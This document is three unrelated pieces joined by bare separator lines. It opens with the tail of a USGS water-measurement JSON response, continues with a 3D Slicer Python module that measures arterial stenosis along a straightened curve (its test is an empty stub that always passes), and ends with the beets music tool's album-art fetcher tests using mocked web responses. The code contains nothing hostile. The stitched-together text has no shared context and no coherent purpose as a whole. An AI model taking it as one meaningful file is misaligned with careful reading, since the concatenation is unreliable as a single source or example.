'dateTime': '2020-04-18T16:32:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:01:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:03:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:04:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:06:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:07:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:09:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:10:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:12:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:14:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:15:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:17:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:19:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:21:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:23:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:26:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:28:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:30:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:32:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:34:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:01:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:03:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:04:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:06:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:07:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:09:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:11:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:12:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:14:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:15:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:17:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:19:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:22:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:24:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:26:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:28:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:30:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:32:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:35:00.000-07:00'}],
'qualifier': [{'qualifierCode': 'P',
'qualifierDescription': 'Provisional data subject to revision.',
'qualifierID': 0,
'network': 'NWIS',
'vocabulary': 'uv_rmk_cd'}],
'qualityControlLevel': [],
'method': [{'methodDescription': 'Variable Depth Profile Data',
'methodID': 254060}],
'source': [],
'offset': [],
'sample': [],
'censorCode': []}],
'name': 'USGS:444306122144600:63680:00000'}]},
'nil': False,
'globalScope': True,
'typeSubstituted': False
}
|
|
import os
import unittest
import logging
import vtk, qt, ctk, slicer
from slicer.ScriptedLoadableModule import *
from slicer.util import VTKObservationMixin
#
# StenosisMeasurement1D
#
class StenosisMeasurement1D(ScriptedLoadableModule):
"""Uses ScriptedLoadableModule base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def __init__(self, parent):
ScriptedLoadableModule.__init__(self, parent)
self.parent.title = "Stenosis measurement : 1D"
self.parent.categories = ["Vascular Modeling Toolkit"]
self.parent.dependencies = []
self.parent.contributors = ["SET [Surgeon] [Hobbyist developer]", "Andras Lasso, PerkLab"]
self.parent.helpText = """
This <a href="https://github.com/vmtk/SlicerExtension-VMTK/">module</a> straightens an open input markups curve and displays cumulative and individual lengths between control points. It is intended for quick one dimensional arterial stenosis evaluation, but is actually purpose agnostic.
"""
# TODO: replace with organization, grant and thanks
self.parent.acknowledgementText = """
This file was originally developed by Jean-Christophe Fillion-Robin, Kitware Inc., Andras Lasso, PerkLab,
and Steve Pieper, Isomics, Inc. and was partially funded by NIH grant 3P41RR013218-12S1.
"""
#
# StenosisMeasurement1DWidget
#
class StenosisMeasurement1DWidget(ScriptedLoadableModuleWidget, VTKObservationMixin):
"""Uses ScriptedLoadableModuleWidget base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def __init__(self, parent=None):
"""
Called when the user opens the module the first time and the widget is initialized.
"""
ScriptedLoadableModuleWidget.__init__(self, parent)
VTKObservationMixin.__init__(self) # needed for parameter node observation
self.logic = None
self._parameterNode = None
self._updatingGUIFromParameterNode = False
def setup(self):
"""
Called when the user opens the module the first time and the widget is initialized.
"""
ScriptedLoadableModuleWidget.setup(self)
# Load widget from .ui file (created by Qt Designer).
# Additional widgets can be instantiated manually and added to self.layout.
uiWidget = slicer.util.loadUI(self.resourcePath('UI/StenosisMeasurement1D.ui'))
self.layout.addWidget(uiWidget)
self.ui = slicer.util.childWidgetVariables(uiWidget)
# Set scene in MRML widgets. Make sure that in Qt designer the top-level qMRMLWidget's
# "mrmlSceneChanged(vtkMRMLScene*)" signal in is connected to each MRML widget's.
# "setMRMLScene(vtkMRMLScene*)" slot.
uiWidget.setMRMLScene(slicer.mrmlScene)
# Create logic class. Logic implements all computations that should be possible to run
# in batch mode, without a graphical user interface.
self.logic = StenosisMeasurement1DLogic()
# Connections
# These connections ensure that we update parameter node when scene is closed
self.addObserver(slicer.mrmlScene, slicer.mrmlScene.StartCloseEvent, self.onSceneStartClose)
self.addObserver(slicer.mrmlScene, slicer.mrmlScene.EndCloseEvent, self.onSceneEndClose)
# Make sure parameter node is initialized (needed for module reload)
self.initializeParameterNode()
# These connections ensure that whenever user changes some settings on the GUI, that is saved in the MRML scene
# (in the selected parameter node).
self.ui.inputMarkupsSelector.connect("currentNodeChanged(vtkMRMLNode*)", self.updateParameterNodeFromGUI)
# Application connections
self.ui.inputMarkupsSelector.connect("currentNodeChanged(vtkMRMLNode*)", lambda node: self.setInputCurve(node))
# Update logic from parameter node
self.logic.setInputCurve(self._parameterNode.GetNodeReference("InputCurve"))
# Fill the table through a callback from logic.
self.logic.widgetCallback = self.populateTable
def cleanup(self):
"""
Called when the application closes and the module widget is destroyed.
"""
self.removeObservers()
def enter(self):
"""
Called each time the user opens this module.
"""
# Make sure parameter node exists and observed
self.initializeParameterNode()
def exit(self):
"""
Called each time the user opens a different module.
"""
# Do not react to parameter node changes (GUI wlil be updated when the user enters into the module)
self.removeObserver(self._parameterNode, vtk.vtkCommand.ModifiedEvent, self.updateGUIFromParameterNode)
def onSceneStartClose(self, caller, event):
"""
Called just before the scene is closed.
"""
# Parameter node will be reset, do not use it anymore
self.setParameterNode(None)
def onSceneEndClose(self, caller, event):
"""
Called just after the scene is closed.
"""
# If this module is shown while the scene is closed then recreate a new parameter node immediately
if self.parent.isEntered:
self.initializeParameterNode()
self.logic.InitMemberVariables()
def initializeParameterNode(self):
"""
Ensure parameter node exists and observed.
"""
# Parameter node stores all user choices in parameter values, node selections, etc.
# so that when the scene is saved and reloaded, these settings are restored.
self.setParameterNode(self.logic.getParameterNode())
def setParameterNode(self, inputParameterNode):
"""
Set and observe parameter node.
Observation is needed because when the parameter node is changed then the GUI must be updated immediately.
"""
if inputParameterNode:
self.logic.setDefaultParameters(inputParameterNode)
# Unobserve previously selected parameter node and add an observer to the newly selected.
# Changes of parameter node are observed so that whenever parameters are changed by a script or any other module
# those are reflected immediately in the GUI.
if self._parameterNode is not None:
self.removeObserver(self._parameterNode, vtk.vtkCommand.ModifiedEvent, self.updateGUIFromParameterNode)
self._parameterNode = inputParameterNode
if self._parameterNode is not None:
self.addObserver(self._parameterNode, vtk.vtkCommand.ModifiedEvent, self.updateGUIFromParameterNode)
# Initial GUI update
self.updateGUIFromParameterNode()
def updateGUIFromParameterNode(self, caller=None, event=None):
"""
This method is called whenever parameter node is changed.
The module GUI is updated to show the current state of the parameter node.
"""
if self._parameterNode is None or self._updatingGUIFromParameterNode:
return
# Make sure GUI changes do not call updateParameterNodeFromGUI (it could cause infinite loop)
self._updatingGUIFromParameterNode = True
# Update node selectors and sliders
self.ui.inputMarkupsSelector.setCurrentNode(self._parameterNode.GetNodeReference("InputCurve"))
# All the GUI updates are done
self._updatingGUIFromParameterNode = False
def updateParameterNodeFromGUI(self, caller=None, event=None):
"""
This method is called when the user makes any change in the GUI.
The changes are saved into the parameter node (so that they are restored when the scene is saved and loaded).
"""
if self._parameterNode is None or self._updatingGUIFromParameterNode:
return
wasModified = self._parameterNode.StartModify() # Modify all properties in a single batch
self._parameterNode.SetNodeReferenceID("InputCurve", self.ui.inputMarkupsSelector.currentNodeID)
self._parameterNode.EndModify(wasModified)
def setInputCurve(self, curveNode):
self.logic.setInputCurve(curveNode)
self.populateTable()
self.logic.widgetCallback = self.populateTable
def populateTable(self):
inputCurve = self.ui.inputMarkupsSelector.currentNode()
outputTable = self.ui.outputTableWidget
# Clean table completely.
outputTable.clear()
outputTable.setRowCount(0)
outputTable.setColumnCount(0)
if not inputCurve:
return
numberOfControlPoints = inputCurve.GetNumberOfControlPoints()
# Setup table.
if outputTable.columnCount == 0:
outputTable.setColumnCount(4)
outputTable.setRowCount(numberOfControlPoints - 1)
columnLabels = ("Cumulative", "Cumulative %", "Partial", "Partial %")
outputTable.setHorizontalHeaderLabels(columnLabels)
# Get global variables.
curveTotalLength = inputCurve.GetCurveLengthWorld()
curveControlPoints = vtk.vtkPoints()
inputCurve.GetControlPointPositionsWorld(curveControlPoints)
partDistance = 0.0
measurementLength = inputCurve.GetMeasurement("length")
measurementLengthUnit = measurementLength.GetUnits()
"""
Iterate over control points.
Start at index 1, we measure backwards.
"""
for pointIndex in range(1, numberOfControlPoints):
curvePoint = curveControlPoints.GetPoint(pointIndex)
controlPointIndex = inputCurve.GetClosestCurvePointIndexToPositionWorld(curvePoint)
# Distance of control point from start.
cumulativeDistance = inputCurve.GetCurveLengthBetweenStartEndPointsWorld(
0, controlPointIndex)
item = qt.QTableWidgetItem()
content = f"{cumulativeDistance:.1f} {measurementLengthUnit}"
item.setText(content)
outputTable.setItem(pointIndex - 1, 0, item)
# Proportional cumulative distance, with respect to total length.
item = qt.QTableWidgetItem()
content = f"{(cumulativeDistance / curveTotalLength) * 100:.1f} %"
item.setText(content)
outputTable.setItem(pointIndex - 1, 1, item)
# Distance between two adjacent points.
previousCurvePoint = curveControlPoints.GetPoint(pointIndex - 1)
previousControlPointIndex = inputCurve.GetClosestCurvePointIndexToPositionWorld(previousCurvePoint)
partDistance = inputCurve.GetCurveLengthBetweenStartEndPointsWorld(
previousControlPointIndex, controlPointIndex)
item = qt.QTableWidgetItem()
content = f"{partDistance:.1f} {measurementLengthUnit}"
item.setText(content)
outputTable.setItem(pointIndex - 1, 2, item)
# Proportional distance between two adjacent points, with respect to total length.
item = qt.QTableWidgetItem()
content = f"{(partDistance / curveTotalLength) * 100:.1f} %"
item.setText(content)
outputTable.setItem(pointIndex - 1, 3, item)
#
# StenosisMeasurement1DLogic
#
class StenosisMeasurement1DLogic(ScriptedLoadableModuleLogic):
def __init__(self):
"""
Called when the logic class is instantiated. Can be used for initializing member variables.
"""
ScriptedLoadableModuleLogic.__init__(self)
self.InitMemberVariables()
def InitMemberVariables(self):
self.inputCurve = None
self.observations = []
self.widgetCallback = None
def setDefaultParameters(self, parameterNode):
"""
Initialize parameter node with default settings.
"""
pass
def setInputCurve(self, curveNode):
# Remove all observations on current curve
if self.inputCurve:
for observation in self.observations:
self.inputCurve.RemoveObserver(observation)
self.observations.clear()
self.inputCurve = curveNode
# React when points are moved, removed or added.
if self.inputCurve:
self.observations.append(self.inputCurve.AddObserver(slicer.vtkMRMLMarkupsNode.PointEndInteractionEvent, self.onCurveControlPointEvent))
# Don't use PointAddedEvent. It is fired on mouse move in views.
self.observations.append(self.inputCurve.AddObserver(slicer.vtkMRMLMarkupsNode.PointPositionDefinedEvent, self.onCurveControlPointEvent))
self.observations.append(self.inputCurve.AddObserver(slicer.vtkMRMLMarkupsNode.PointRemovedEvent, self.onCurveControlPointEvent))
self.process()
else:
msg = "No curve."
slicer.util.showStatusMessage(msg, 4000)
slicer.app.processEvents()
logging.info(msg)
# Signal widget to clear the table.
if self.widgetCallback:
self.widgetCallback()
def onCurveControlPointEvent(self, caller, event):
self.process()
def process(self):
if not self.inputCurve:
msg = "No curve."
slicer.util.showStatusMessage(msg, 4000)
slicer.app.processEvents()
logging.info(msg)
return
# Don't do anything if there are 2 points only, already a line.
if (self.inputCurve.GetNumberOfControlPoints() == 2):
# Just signal widget to fill the table with results.
if self.widgetCallback:
self.widgetCallback()
return
# Generate a linear polydata from first and last control point.
numberOfControlPoints = self.inputCurve.GetNumberOfControlPoints()
lineSource = vtk.vtkLineSource()
curveControlPoints = vtk.vtkPoints()
self.inputCurve.GetControlPointPositionsWorld(curveControlPoints)
firstControlPointPosition = curveControlPoints.GetPoint(0)
lastControlPointPosition = curveControlPoints.GetPoint(numberOfControlPoints - 1)
lineSource.SetPoint1(firstControlPointPosition)
lineSource.SetPoint2(lastControlPointPosition)
lineSource.Update()
linePolyData = lineSource.GetOutput()
# The polydata contains 2 points. Generate more points.
polydataSampler = vtk.vtkPolyDataPointSampler()
polydataSampler.SetInputData(linePolyData)
polydataSampler.Update()
# This is the reference line polydata.
straightLinePolyData = polydataSampler.GetOutput()
startPoint = curveControlPoints.GetPoint(0)
cumulativeDistanceArray = [[0.0, startPoint]]
# Iterate over all curve points, ignoring first and last.
for pointIndex in range(1, numberOfControlPoints - 1):
point = curveControlPoints.GetPoint(pointIndex)
closestIdOnStraightLine = straightLinePolyData.FindPoint(point)
closestPointOnStraightLine = straightLinePolyData.GetPoint(closestIdOnStraightLine)
cumulativeDistanceOfClosestPoint = vtk.vtkMath.Distance2BetweenPoints(
startPoint, closestPointOnStraightLine)
cumulativeDistanceArray.append([cumulativeDistanceOfClosestPoint,
closestPointOnStraightLine])
"""
Move each control point to the closest point on the virtual line.
If we have n control points ABCD..., C can be pushed
between A and B on the virtual line. The curve is still valid, though
the points are in zig-zag order. Distances will be less or not meaningful.
Sort the points by distance from start to avoid this.
"""
sortedCumulativeDistanceArray = sorted(cumulativeDistanceArray,
key=lambda distance: distance[0])
for pointIndex in range(1, numberOfControlPoints - 1):
self.inputCurve.SetNthControlPointPosition(pointIndex,
sortedCumulativeDistanceArray[pointIndex][1])
# Signal widget to fill the table with results.
if self.widgetCallback:
self.widgetCallback()
#
# StenosisMeasurement1DTest
#
class StenosisMeasurement1DTest(ScriptedLoadableModuleTest):
"""
This is the test case for your scripted module.
Uses ScriptedLoadableModuleTest base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def setUp(self):
""" Do whatever is needed to reset the state - typically a scene clear will be enough.
"""
slicer.mrmlScene.Clear()
def runTest(self):
"""Run as few or as many tests as needed here.
"""
self.setUp()
self.test_StenosisMeasurement1D1()
def test_StenosisMeasurement1D1(self):
""" Ideally you should have several levels of tests. At the lowest level
tests should exercise the functionality of the logic with different inputs
(both valid and invalid). At higher levels your tests should emulate the
way the user would interact with your code and confirm that it still works
the way you intended.
One of the most important features of the tests is that it should alert other
developers when their changes will have an impact on the behavior of your
module. For example, if a developer removes a feature that you depend on,
your test should break so they know that the feature is needed.
"""
self.delayDisplay("Starting the test")
self.delayDisplay('Test passed')
|
|
# -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Tests for the album art fetchers."""
from __future__ import division, absolute_import, print_function
import os
import shutil
import unittest
import responses
from mock import patch
from test import _common
from test.helper import capture_log
from beetsplug import fetchart
from beets.autotag import AlbumInfo, AlbumMatch
from beets import config
from beets import library
from beets import importer
from beets import logging
from beets import util
from beets.util.artresizer import ArtResizer, WEBPROXY
import confuse
logger = logging.getLogger('beets.test_art')
class Settings():
"""Used to pass settings to the ArtSources when the plugin isn't fully
instantiated.
"""
def __init__(self, **kwargs):
for k, v in kwargs.items():
setattr(self, k, v)
class UseThePlugin(_common.TestCase):
def setUp(self):
super(UseThePlugin, self).setUp()
self.plugin = fetchart.FetchArtPlugin()
class FetchImageHelper(_common.TestCase):
"""Helper mixin for mocking requests when fetching images
with remote art sources.
"""
@responses.activate
def run(self, *args, **kwargs):
super(FetchImageHelper, self).run(*args, **kwargs)
IMAGEHEADER = {'image/jpeg': b'\x00' * 6 + b'JFIF',
'image/png': b'\211PNG\r\n\032\n', }
def mock_response(self, url, content_type='image/jpeg', file_type=None):
if file_type is None:
file_type = content_type
responses.add(responses.GET, url,
content_type=content_type,
# imghdr reads 32 bytes
body=self.IMAGEHEADER.get(
file_type, b'').ljust(32, b'\x00'))
class CAAHelper():
"""Helper mixin for mocking requests to the Cover Art Archive."""
MBID_RELASE = 'rid'
MBID_GROUP = 'rgid'
RELEASE_URL = 'coverartarchive.org/release/{0}' \
.format(MBID_RELASE)
GROUP_URL = 'coverartarchive.org/release-group/{0}' \
.format(MBID_GROUP)
if util.SNI_SUPPORTED:
RELEASE_URL = "https://" + RELEASE_URL
GROUP_URL = "https://" + GROUP_URL
else:
RELEASE_URL = "http://" + RELEASE_URL
GROUP_URL = "http://" + GROUP_URL
RESPONSE_RELEASE = """{
"images": [
{
"approved": false,
"back": false,
"comment": "GIF",
"edit": 12345,
"front": true,
"id": 12345,
"image": "http://coverartarchive.org/release/rid/12345.gif",
"thumbnails": {
"1200": "http://coverartarchive.org/release/rid/12345-1200.jpg",
"250": "http://coverartarchive.org/release/rid/12345-250.jpg",
"500": "http://coverartarchive.org/release/rid/12345-500.jpg",
"large": "http://coverartarchive.org/release/rid/12345-500.jpg",
"small": "http://coverartarchive.org/release/rid/12345-250.jpg"
},
"types": [
"Front"
]
},
{
"approved": false,
"back": false,
"comment": "",
"edit": 12345,
"front": false,
"id": 12345,
"image": "http://coverartarchive.org/release/rid/12345.jpg",
"thumbnails": {
"1200": "http://coverartarchive.org/release/rid/12345-1200.jpg",
"250": "http://coverartarchive.org/release/rid/12345-250.jpg",
"500": "http://coverartarchive.org/release/rid/12345-500.jpg",
"large": "http://coverartarchive.org/release/rid/12345-500.jpg",
"small": "http://coverartarchive.org/release/rid/12345-250.jpg"
},
"types": [
"Front"
]
}
],
"release": "https://musicbrainz.org/release/releaseid"
}"""
RESPONSE_GROUP = """{
"images": [
{
"approved": false,
"back": false,
"comment": "",
"edit": 12345,
"front": true,
"id": 12345,
"image": "http://coverartarchive.org/release/releaseid/12345.jpg",
"thumbnails": {
"1200": "http://coverartarchive.org/release/rgid/12345-1200.jpg",
"250": "http://coverartarchive.org/release/rgid/12345-250.jpg",
"500": "http://coverartarchive.org/release/rgid/12345-500.jpg",
"large": "http://coverartarchive.org/release/rgid/12345-500.jpg",
"small": "http://coverartarchive.org/release/rgid/12345-250.jpg"
},
"types": [
"Front"
]
}
],
"release": "https://musicbrainz.org/release/release-id"
}"""
def mock_caa_response(self, url, json):
responses.add(responses.GET, url, body=json,
content_type='application/json')
class FetchImageTest(FetchImageHelper, UseThePlugin):
URL = 'http://example.com/test.jpg'
def setUp(self):
super(FetchImageTest, self).setUp()
self.dpath = os.path.join(self.temp_dir, b'arttest')
self.source = fetchart.RemoteArtSource(logger, self.plugin.config)
self.settings = Settings(maxwidth=0)
self.candidate = fetchart.Candidate(logger, url=self.URL)
def test_invalid_type_returns_none(self):
self.mock_response(self.URL, 'image/watercolour')
self.source.fetch_image(self.candidate, self.settings)
self.assertEqual(self.candidate.path, None)
def test_jpeg_type_returns_path(self):
self.mock_response(self.URL, 'image/jpeg')
self.source.fetch_image(self.candidate, self.settings)
self.assertNotEqual(self.candidate.path, None)
def test_extension_set_by_content_type(self):
self.mock_response(self.URL, 'image/png')
self.source.fetch_image(self.candidate, self.settings)
self.assertEqual(os.path.splitext(self.candidate.path)[1], b'.png')
self.assertExists(self.candidate.path)
def test_does_not_rely_on_server_content_type(self):
self.mock_response(self.URL, 'image/jpeg', 'image/png')
self.source.fetch_image(self.candidate, self.settings)
self.assertEqual(os.path.splitext(self.candidate.path)[1], b'.png')
self.assertExists(self.candidate.path)
class FSArtTest(UseThePlugin):
def setUp(self):
super(FSArtTest, self).setUp()
self.dpath = os.path.join(self.temp_dir, b'arttest')
os.mkdir(self.dpath)
self.source = fetchart.FileSystem(logger, self.plugin.config)
self.settings = Settings(cautious=False,
cover_names=('art',))
def test_finds_jpg_in_directory(self):
_common.touch(os.path.join(self.dpath, b'a.jpg'))
candidate = next(self.source.get(None, self.settings, [self.dpath]))
self.assertEqual(candidate.path, os.path.join(self.dpath, b'a.jpg'))
def test_appropriately_named_file_takes_precedence(self):
_common.touch(os.path.join(self.dpath, b'a.jpg'))
_common.touch(os.path.join(self.dpath, b'art.jpg'))
candidate = next(self.source.get(None, self.settings, [self.dpath]))
self.assertEqual(candidate.path, os.path.join(self.dpath, b'art.jpg'))
def test_non_image_file_not_identified(self):
_common.touch(os.path.join(self.dpath, b'a.txt'))
with self.assertRaises(StopIteration):
next(self.source.get(None, self.settings, [self.dpath]))
def test_cautious_skips_fallback(self):
_common.touch(os.path.join(self.dpath, b'a.jpg'))
self.settings.cautious = True
with self.assertRaises(StopIteration):
next(self.source.get(None, self.settings, [self.dpath]))
def test_empty_dir(self):
with self.assertRaises(StopIteration):
next(self.source.get(None, self.settings, [self.dpath]))
def test_precedence_amongst_correct_files(self):
images = [b'front-cover.jpg', b'front.jpg', b'back.jpg']
paths = [os.path.join(self.dpath, i) for i in images]
for p in paths:
_common.touch(p)
self.settings.cover_names = ['cover', 'front', 'back']
candidates = [candidate.path for candidate in
self.source.get(None, self.settings, [self.dpath])]
self.assertEqual(candidates, paths)
class CombinedTest(FetchImageHelper, UseThePlugin, CAAHelper):
ASIN = 'xxxx'
MBID = 'releaseid'
AMAZON_URL = 'https://images.amazon.com/images/P/{0}.01.LZZZZZZZ.jpg' \
.format(ASIN)
AAO_URL = 'https://www.albumart.org/index_detail.php?asin={0}' \
.format(ASIN)
def setUp(self):
super(CombinedTest, self).setUp()
self.dpath = os.path.join(self.temp_dir, b'arttest')
os.mkdir(self.dpath)
def test_main_interface_returns_amazon_art(self):
self.mock_response(self.AMAZON_URL)
album = _common.Bag(asin=self.ASIN)
candidate = self.plugin.art_for_album(album, None)
self.assertIsNotNone(candidate)
def test_main_interface_returns_none_for_missing_asin_and_path(self):
album = _common.Bag()
candidate = self.plugin.art_for_album(album, None)
self.assertIsNone(candidate)
def test_main_interface_gives_precedence_to_fs_art(self):
_common.touch(os.path.join(self.dpath, b'art.jpg'))
self.mock_response(self.AMAZON_URL)
album = _common.Bag(asin=self.ASIN)
candidate = self.plugin.art_for_album(album, [self.dpath])
self.assertIsNotNone(candidate)
self.assertEqual(candidate.path, os.path.join(self.dpath, b'art.jpg'))
def test_main_interface_falls_back_to_amazon(self):
self.mock_response(self.AMAZON_URL)
album = _common.Bag(asin=self.ASIN)
candidate = self.plugin.art_for_album(album, [self.dpath])
self.assertIsNotNone(candidate)
self.assertFalse(candidate.path.startswith(self.dpath))
def test_main_interface_tries_amazon_before_aao(self):
self.mock_response(self.AMAZON_URL)
album = _common.Bag(asin=self.ASIN)
self.plugin.art_for_album(album, [self.dpath])
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, self.AMAZON_URL)
def test_main_interface_falls_back_to_aao(self):
self.mock_response(self.AMAZON_URL, content_type='text/html')
album = _common.Bag(asin=self.ASIN)
self.plugin.art_for_album(album, [self.dpath])
self.assertEqual(responses.calls[-1].request.url, self.AAO_URL)
def test_main_interface_uses_caa_when_mbid_available(self):
self.mock_caa_response(self.RELEASE_URL, self.RESPONSE_RELEASE)
self.mock_caa_response(self.GROUP_URL, self.RESPONSE_GROUP)
self.mock_response('http://coverartarchive.org/release/rid/12345.gif',
content_type='image/gif')
self.mock_response('http://coverartarchive.org/release/rid/12345.jpg',
content_type='image/jpeg')
album = _common.Bag(mb_albumid=self.MBID_RELASE,
mb_releasegroupid=self.MBID_GROUP,
asin=self.ASIN)
candidate = self.plugin.art_for_album(album, None)
self.assertIsNotNone(candidate)
self.assertEqual(len(responses.calls), 3)
self.assertEqual(responses.calls[0].request.url, self.RELEASE_URL)
def test_local_only_does_not_access_network(self):
album = _common.Bag(mb_albumid=self.MBID, asin=self.ASIN)
self.plugin.art_for_album(album, None, local_only=True)
self.assertEqual(len(responses.calls), 0)
def test_local_only_gets_fs_image(self):
_common.touch(os.path.join(self.dpath, b'art.jpg'))
album = _common.Bag(mb_albumid=self.MBID, asin=self.ASIN)
candidate = self.plugin.art_for_album(album, [self.dpath],
local_only=True)
self.assertIsNotNone(candidate)
self.assertEqual(candidate.path, os.path.join(self.dpath, b'art.jpg'))
self.assertEqual(len(responses.calls), 0)
class AAOTest(UseThePlugin):
ASIN = 'xxxx'
AAO_URL = 'https://www.albumart.org/index_detail.php?asin={0}'.format(ASIN)
def setUp(self):
super(AAOTest, self).setUp()
self.source = fetchart.AlbumArtOrg(logger, self.plugin.config)
self.settings = Settings()
@responses.activate
def run(self, *args, **kwargs):
super(AAOTest, self).run(*args, **kwargs)
def mock_response(self, url, body):
responses.add(responses.GET, url, body=body, content_type='text/html',
match_querystring=True)
def test_aao_scraper_finds_image(self):
body = """
<br />
<a href=\"TARGET_URL\" title=\"View larger image\"
class=\"thickbox\" style=\"color: #7E9DA2; text-decoration:none;\">
<img src=\"http://www.albumart.org/images/zoom-icon.jpg\"
alt=\"View larger image\" width=\"17\" height=\"15\" border=\"0\"/></a>
"""
self.mock_response(self.AAO_URL, body)
album = _common.Bag(asin=self.ASIN)
candidate = next(self.source.get(album, self.settings, []))
self.assertEqual(candidate.url, 'TARGET_URL')
def test_aao_scraper_returns_no_result_when_no_image_present(self):
self.mock_response(self.AAO_URL, 'blah blah')
album = _common.Bag(asin=self.ASIN)
with self.assertRaises(StopIteration):
next(self.source.get(album, self.settings, []))
class ITunesStoreTest(UseThePlugin):
def setUp(self):
super(ITunesStoreTest, self).setUp()
self.source = fetchart.ITunesStore(logger, self.plugin.config)
self.settings = Settings()
self.album = _common.Bag(albumartist="some artist", album="some album")
@responses.activate
def run(self, *args, **kwargs):
super(ITunesStoreTest, self).run(*args, **kwargs)
def mock_response(self, url, json):
responses.add(responses.GET, url, body=json,
content_type='application/json')
def test_itunesstore_finds_image(self):
json = """{
"results":
[
{
"artistName": "some artist",
"collectionName": "some album",
"artworkUrl100": "url_to_the_image"
}
]
}"""
self.mock_response(fetchart.ITunesStore.API_URL, json)
candidate = next(self.source.get(self.album, self.settings, []))
self.assertEqual(candidate.url, 'url_to_the_image')
self.assertEqual(candidate.match, fetchart.Candidate.MATCH_EXACT)
def test_itunesstore_no_result(self):
json = '{"results": []}'
self.mock_response(fetchart.ITunesStore.API_URL, json)
expected = u"got no results"
with capture_log('beets.test_art') as logs:
with self.assertRaises(StopIteration):
next(self.source.get(self.album, self.settings, []))
self.assertIn(expected, logs[1])
def test_itunesstore_requestexception(self):
responses.add(responses.GET, fetchart.ITunesStore.API_URL,
json={'error': 'not found'}, status=404)
expected = u'iTunes search failed: 404 Client Error'
with capture_log('beets.test_art') as logs:
with self.assertRaises(StopIteration):
next(self.source.get(self.album, self.settings, []))
self.assertIn(expected, logs[1])
def test_itunesstore_fallback_match(self):
json = """{
"results":
[
{
"collectionName": "some album",
"artworkUrl100": "url_to_the_image"
}
]
}"""
self.mock_response(fetchart.ITunesStore.API_URL, json)
candidate = next(self.source.get(self.album, self.settings, []))
self.assertEqual(candidate.url, 'url_to_the_image')
self.assertEqual(candidate.match, fetchart.Candidate.MATCH_FALLBACK)
def test_itunesstore_returns_result_without_artwork(self):
json = """{
"results":
[
{
"artistName": "some artist",
"collectionName": "some album"
}
]
}"""
self.mock_response(fetchart.ITunesStore.API_URL, json)
expected = u'Malformed itunes candidate'
with capture_log('beets.test_art') as logs:
with self.assertRaises(StopIteration):
next(self.source.get(self.album, self.settings, []))
self.assertIn(expected, logs[1])
